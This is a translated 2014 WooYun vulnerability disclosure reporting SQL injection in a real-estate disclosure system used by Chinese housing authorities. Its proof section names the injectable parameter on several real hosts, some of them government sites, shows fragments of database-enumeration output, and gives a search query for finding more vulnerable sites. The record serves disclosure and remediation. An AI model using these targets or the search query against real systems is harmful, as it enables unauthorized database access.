
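Vulnerability Summary

Bug ID: wooyun-2014-060984

Title: Generic SQL injection in a real-estate public disclosure system (affects real-estate management centers and housing administration bureaus in multiple provinces and cities nationwide)

Vendor: a real-estate public disclosure system

Author: 雅柏菲卡

Submitted: 2014-05-19 17:35

Fixed: 2014-08-17 17:36

Disclosed: 2014-08-17 17:36

Type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]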



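Vulnerability Details

Disclosure status:

2014-05-19: Details reported to the vendor; awaiting vendor handling
2014-05-24: Vendor confirmed; details disclosed to the vendor only
2014-05-27: Details opened to third-party security partners
2014-07-18: Details disclosed to core white hats and experts in related fields
2014-07-28: Details disclosed to regular white hats
2014-08-07: Details disclosed to intern white hats
2014-08-17: Details disclosed to the public

Brief description:

.......

Detailed description:

........

Proof of vulnerability:

Linyi County (临邑县)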
http://222.133.15.182/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%C2%B3%C1%D9%B7%BF%D4%A4%CA%DB%D6%A4%B5%DA126%BA%C5
available databases [53]:
Tai'an City (泰安市)
http://www.tazzfdc.gov.cn/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%CC%A9%B7%BF%D4%A4%CA%DB%D6%A4%B5%DA(2014)011%BA%C5
available databases [45]:
Unidentified organization
http://123.7.180.231/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%D0%E9%C4%E2%D4%A4%CA%DB%D0%ED%BF%C9002
available databases [45]:
http://www.lwfccs.com/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%C0%B3%B7%BF%CA%DB%D7%D6%B5%DA000150%BA%C5
http://www.zmdfcxx.com/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%D7%A4%B7%BF%D7%D6%B5%DA20140048%BA%C5
http://www.bjsfdc.com.cn/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=(2014)%B1%A6%CA%D0%B7%BF%D4%A4%CA%DB%D6%A4%B5%DA1181%BA%C5
http://gs.wf777.com/bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno=%CE%AB2011%B7%BF%D4%A4%CA%DB%D6%A4%D7%D6%B5%DA00002864%BA%C5
There are many more; search keyword: "bit-xxzs/xmlpzs/ysxkxxzs6.asp?permitsaleno="
https://www.google.com.hk/search?q=bit-xxzs/xmlpzs/ysxkxxzs6.asp%3Fpermitsaleno%3D&safe=strict&ei=G3t1U9jiPISQuASk4oDABA&start=20&sa=N&biw=1649&bih=891
Many more result pages are the same.

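Remediation:

..............

Copyright notice: when reposting, please credit the source 雅柏菲卡@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-05-24 12:56

Vendor reply:

Based on the situation described, CNVD did not directly test all of the cases; the report has been passed via CNCERT to the Shandong branch center, with the recommendation that it test and then handle the government cases.

Latest status:

None yet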